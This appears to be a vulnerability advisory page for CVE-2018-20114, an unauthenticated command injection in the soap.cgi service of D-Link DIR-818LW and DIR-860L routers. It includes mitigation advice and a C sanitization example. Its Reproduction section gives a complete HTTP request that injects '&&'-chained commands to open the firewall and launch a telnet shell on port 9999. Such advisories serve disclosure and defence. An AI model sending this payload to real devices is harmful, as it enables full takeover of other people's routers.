CVE-2018-20114
Description
On D-Link DIR-818LW Rev.A 2.05.B03 and DIR-860L Rev.B 2.03.B03 devices, unauthenticated remote OS command execution can occur in the soap.cgi service of the cgibin binary via an "&&" substring in the service parameter. NOTE: this issue exists because of an incomplete fix for CVE-2018-6530.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated remote command injection via '&&' in the soap.cgi service parameter on D-Link DIR-818LW Rev.A and DIR-860L Rev.B allows full device compromise.
Vulnerability
The vulnerability is an OS command injection in the soapcgi_main function of the cgibin binary on D-Link DIR-818LW Rev.A firmware version 2.05.B03 and DIR-860L Rev.B firmware version 2.03.B03 [1]. The soap.cgi endpoint, accessible on TCP port 49152, accepts a service GET parameter. An unauthenticated remote attacker can inject arbitrary shell commands by including an && substring in the service parameter. This issue is an incomplete fix for CVE-2018-6530, where some character sanitization via strchr was added but failed to filter the && sequence [1].
Exploitation
An attacker can send a crafted HTTP POST request to the /soap.cgi endpoint on TCP port 49152 with a malicious service parameter containing && followed by shell commands. No authentication is required. The reference includes a proof of concept (PoC) that chains multiple commands to disable iptables rules and start a telnetd listener on port 9999, then connect via telnet [1]. The attacker only needs network access to the device's port 49152.
Impact
Successful exploitation allows an unauthenticated remote attacker to execute arbitrary OS commands with full system privileges on the affected D-Link routers [1]. This can lead to complete compromise of the device, including data exfiltration, installation of malware, or use of the router as a pivot point in further network attacks.
Mitigation
As of the publication date (January 2, 2019), D-Link had not released a firmware update that fully addresses this vulnerability [1]. Users should monitor D-Link's support website for firmware patches or consider disabling remote management and restricting access to port 49152 via firewall rules as a workaround. The affected devices may be end-of-life; users should evaluate upgrading to newer, supported hardware.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"Incomplete input sanitization in the soapcgi_main function allows the && shell metacharacter sequence to bypass the strchr-based filter added for CVE-2018-6530."
Attack vector
An unauthenticated remote attacker sends an HTTP POST request to the `/soap.cgi` endpoint on TCP port 49152. The `service` GET parameter is not fully sanitized; although a prior fix for CVE-2018-6530 added character filtering via `strchr`, the `&&` substring was not blocked [1]. By injecting `&&` followed by arbitrary shell commands into the `service` parameter, the attacker achieves OS command injection. The PoC demonstrates chaining multiple `iptables` commands to open firewall rules and then launching `telnetd` on port 9999 for interactive shell access [1].
Affected code
The vulnerability resides in the `soapcgi_main` function of the `cgibin` binary. The affected firmware versions are DIR-818LW_REVA 2.05.B03 and DIR-860L_REVB 2.03.B03 [1].
What the fix does
No patch is provided in the bundle. The advisory notes that the vendor attempted to fix a similar vulnerability (CVE-2018-6530) by adding character sanitization with `strchr`, but the filter was incomplete because it did not block the `&&` substring [1]. To remediate, the vendor would need to extend the input validation in `soapcgi_main` to reject or escape the `&&` sequence and other shell metacharacters in the `service` parameter.
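The gap between a `strchr` denylist and an allowlist, as an added example (not D-Link's code and not from the advisory). The denylist character set, the function names, the 64-byte limit and the allowed characters are all assumptions, since the page only says that `&&` passed the filter.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed denylist: the page does not say which characters the
 * CVE-2018-6530 fix checked, only that "&&" got through. */
static const char DENYLIST[] = ";|`$\n";

/* Denylist check in the style the page describes: one strchr() per
 * rejected character. Returns 1 if the value is accepted. */
int denylist_accepts(const char *service)
{
    for (const char *d = DENYLIST; *d != '\0'; d++) {
        if (strchr(service, *d) != NULL)
            return 0;
    }
    return 1;
}

/* Allowlist check: accept only a short, non-empty name built from
 * characters a service identifier plausibly needs (an assumption).
 * Anything not listed, '&' and spaces included, is rejected. */
int allowlist_accepts(const char *service)
{
    size_t len = strlen(service);
    if (len == 0 || len > 64)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)service[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample values, not taken from the advisory. */
    const char *samples[] = { "WANIPConn1", "x;echo test",
                              "x&&echo test", "x&echo test", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s denylist=%d allowlist=%d\n", samples[i],
               denylist_accepts(samples[i]), allowlist_accepts(samples[i]));
    return 0;
}
```

Validation of this kind is a backstop: the metacharacter problem exists only because the value reaches a shell command string, so passing it as a separate argv element to `execve` removes the shell from the path.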
Preconditions
- config: The target device must be running DIR-818LW_REVA firmware 2.05.B03 or DIR-860L_REVB firmware 2.03.B03
- network: The attacker must have network access to TCP port 49152 on the device
- auth: No authentication is required
- input: The attacker sends a crafted HTTP POST request with shell metacharacters in the service parameter
Reproduction
1. Connect to the target device on port 49152 using netcat: `nc 192.168.0.1 49152`
2. Send the following HTTP POST request:
```
POST /soap.cgi?service=&&iptables -P INPUT ACCEPT&&iptables -P FORWARD ACCEPT&&iptables -P OUTPUT ACCEPT&&iptables -t nat -P PREROUTING ACCEPT&&iptables -t nat -P OUTPUT ACCEPT&&iptables -t nat -P POSTROUTING ACCEPT&&telnetd -p 9999&& HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml
```
3. Connect to the spawned telnet shell: `telnet 192.168.0.1 9999` [1]
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/pr0v3rbs/CVE/tree/master/CVE-2018-20114 (mitre, x_refsource_MISC)